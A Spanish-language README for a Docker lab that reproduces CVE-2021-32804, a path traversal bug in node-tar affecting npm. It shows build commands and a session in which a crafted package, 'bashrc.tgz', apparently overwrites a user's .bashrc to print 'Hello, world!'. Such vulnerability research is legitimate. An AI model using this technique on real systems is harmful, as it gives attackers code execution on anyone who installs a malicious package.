
Entorno de reproducción basado en Docker para CVE-2021-32804, una vulnerabilidad de path traversal en node-tar que afecta a npm, con scripts de explotación paso a paso.
Repositorio para construir el entorno Docker utilizado en el blog de yamory 「Vulnerabilidad de path traversal en node-tar que también afecta a npm CVE-2021-32804」.
docker build -t cve-2021-32804 .
docker run -it cve-2021-32804 /bin/bash
root@5e1af2148215:/poc# node tar.js
root@5e1af2148215:/poc# su node
Hello, world!
root@5e1af2148215:/poc# npm i bashrc.tgz
root@5e1af2148215:/poc# su node
Hello, world!